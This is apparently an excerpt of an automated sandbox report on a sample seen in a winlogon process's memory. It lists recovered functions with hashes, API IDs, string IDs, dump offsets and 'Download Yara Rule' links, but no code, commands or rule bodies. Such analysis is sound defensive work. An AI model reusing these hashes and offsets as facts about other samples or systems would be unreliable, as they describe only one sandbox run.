                                                                      • Instruction ID: 08e43dfad6d8615d8f85c57d7ba3ea724eca04319fcf64bf6a9629f1effc9644
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 48F08231704B8682EA818F17B9142B96260AB98FF0F884230FE6607B9CDF3CC6458700
                                                                      Function 000001F385BC5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                      • Instruction ID: 7c2467fcd7596e74ea46f889efb0ad8b7ca6e31623e23edea5d0d94c658ca5ce
                                                                      • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                      • Instruction Fuzzy Hash: 4C61B936519B41C6EAA1CB15E44436A77A0F3E87E5F501236FA9D47BE8DB7CCA408F04
                                                                      Function 000001F385BA3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 794d2f98abea2925b2b8cede53a2b7d91a83073eef87499136fa15848af996f8
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 01119E32A12B1311FAE7152CE8563F919C06BF83F5F788738BD76062EE9A2CCA415600
                                                                      Function 000001F385BD4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: b511d5ba25b715f1dcfcca7696c36e76f84fb4604d3e81650d778d100f02beee
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: DD11513AA10E9331FAEA1768D4563F519516BF83F8F280734BD76066DE8AACCA454600
                                                                      Function 000001F385C03504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 2241a7eeb7cf42f6862469b93fdda74b784df1d8e04a5361b92d205a9f787443
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 0E11A333A14E1311FAE4166AE4553F931B06BD8BF5F588738BD76562FECA2CCB414A00
                                                                      Function 000001F385B9F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 798ca2d8f1bf394026dd0354072af2df215992b6fdb75384f3c3813a05e348a0
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 40618F3260421242FAEB8A64D4403B9BAA0A7E57F0F604635FD3A137ECEB3CCA418640
                                                                      Function 000001F385BFF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 71fcdac98b04f8c90e1cb381e77d598407ed309b185261e514eb70d2d2d45b85
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 4F617E3650024243FAE69AA5D5403BD6AA0E7E17E0F644735FD2A937ECDB3C8B41C700
                                                                      Function 000001F385BCAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 7d0dfc8a691413f4dde3a8332c91cc347d6227e1e938a84b6f8a2983f74cfa34
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: BE616A32600B858AEB51DF65D4403ED77A1F3A4BE8F044225EF9917B98DB38DA95C704
                                                                      Function 000001F385B9A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 634da43ffc88561904e9c766b05514423cef216fd51c5e43a622db91c593a43a
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: BB516132104382CAEBA68B1595443B977A0F3A5BE4F185325FF6947BD9EB3CD691C700
                                                                      Function 000001F385BCAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: cdeba406e24003a3a0b1675a6f9d7472096d73f7c1ad2f2c69448a9297637e66
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: F0518F72100682CAEBA58F5594843A977A0F3A5BE5F144335FE6987BD9CB3CDE50C708
                                                                      Function 000001F385BFA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: de6bc9e0d1430427b2a72eb52cbb69da6f06b7e4055c4c057576433a11f966a7
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 98515E36100282CBEBA98B9595443A877A0F3A5BE4F185325FE69C7BDDCB3CD690C700
                                                                      Function 000001F385B98405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: e304355abc066f96e17f3cd7cdfa1338fafb4ef0b8800f9706e494f0d0c637c8
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: E2519F326016028BDB96CB25E454BA93795F3A4BE8F508234FE26477CCFB38CA458704
                                                                      Function 000001F385BF8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: ba53dc36e80807c3e2d48e7356b2653b066ac3483705aa10495dd9823df6bc95
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: C351903271160287DB96CB55E454FA937A5F3A4BE8F508234FE26877CCEB38CA418B44
                                                                      Function 000001F385B983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 1f122b48d9d6f5b20c7e8e545056d8ecb40dcf6bafc27ce726ad1e6dc5d3d349
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: D131907220164296E796DF11E8447A97764F7A0BE8F158234FE6A477CCEB3CCA40C704
                                                                      Function 000001F385BF83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 284da866f2f5732ca223679ce680b25411ae6709bb61a3885cc83e3b25b646bf
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 1631903220164287EB96DF55E844BA93B64F390BE8F058224FE66837CCDB3CCA41CB44
                                                                      Function 000001F385BD2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 48194c91b75594280cb710552ccab9c4b6c9696179c88a7cdcdc75127d28105e
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: 9ED1AF32714A8189EB52CFA5D4402EC7BB1F7A47E8F148225EE6997BDDDA3CC606C740
                                                                      Function 000001F385BC14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: d3793489244d99d11474eaedf2291eb90a0db23d9d29e5d8d83fa4e484c9e938
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: D701CC32600A92D6EB85DF62E8041AA63A0FBA9FD1F545130FE6903759DE38C610C740
                                                                      Function 000001F385BD2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 219b268d2508d01396f34f1c17f2a067e3db346685af521888a3d4dc08d7a7f4
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: 1F91D73370069685FF969FA584403FDABA0F7A4BE8F544225EE1A576CCDA7CC542C700
                                                                      Function 000001F385BC253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: 60e99ca984fe45c8205c3015f8f1e509e2abf101529f829098595df2463e0b0f
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 6D71B13620078286EAA69F6598843FAA694F3E57E4F440236FD6953BCDDA3CCF458704
                                                                      Function 000001F385B99E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 639785ff94cdbec34cdd26092e8e57918619dd365a49ed2093a17fdf676396e3
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 77617C33A00B458AEBA2DF65D4403ED7BA1F394BE8F144225EF6917B98EB38D655C700
                                                                      Function 000001F385BF9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 768f49f300d8609a6abab68202dda315b1d19df14fbc99aa50587f3a5c2b46f2
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 9E619B33600B858AEB65DFA5E0403ED77A1F394BE8F044226EF6957B98DB38D295C700
                                                                      Function 000001F385BC2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 72e056ba0e2456e91081c2497b6582406c8d111315e180d16f48c373d1f09fb1
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 8C51D63220438382EEA69B69A1643FA9651F3E57E0F440235FEA903BCDCA3DCF048744
                                                                      Function 000001F385BD26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: 7545201565cffb4dd9c12d3e017e1e4cb621b9b8cbb6a5680d551cdf74df0a63
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: F241BF32214A8182DBA28F65E8443F9A7A0F7A87E4F904231EE5D87788EB7CC641C740
                                                                      Function 000001F385BC94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 7feea5767932b83702a4603a4908a0b46db3a5e551aabef06720e3f0f0bcf91d
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: DB113036214B4182EB618F15F4403A977E5F798BA4F584225EE9C07798DF3CCA51C704
                                                                      Function 000001F385B97356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: 27eb8d332144c49fc42977003a1dd22787e74c1ec773337d6b22f03e146d9e6f
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 2DE08671641B4990DF038F21E8402E837A1DBA8BB4F589232AD6C0A395FB3CD3E9C701
                                                                      Function 000001F385BF7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: cbed634acb7f4e420854ae58bba93560634c5ebebd018ce6374671fac8fe3439
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 95E0807264074591DF014F61D4402E47360D798774B449231AD5C46355F63CD2E9C700
                                                                      Function 000001F385B973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 9cfed72d77cccaa36cf3e22940643e972630171375edc54bb3644584a963761a
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: E6E08671601B4990DF038F21E4401E87761E7A8BA4F989232ED5C0A395FB3CD3E5C300
                                                                      Function 000001F385BF73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: e5f91ae01f9c44b97bbe6ed0de8d9856cd4c38cc7e306267f4dcf56f001a539c
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
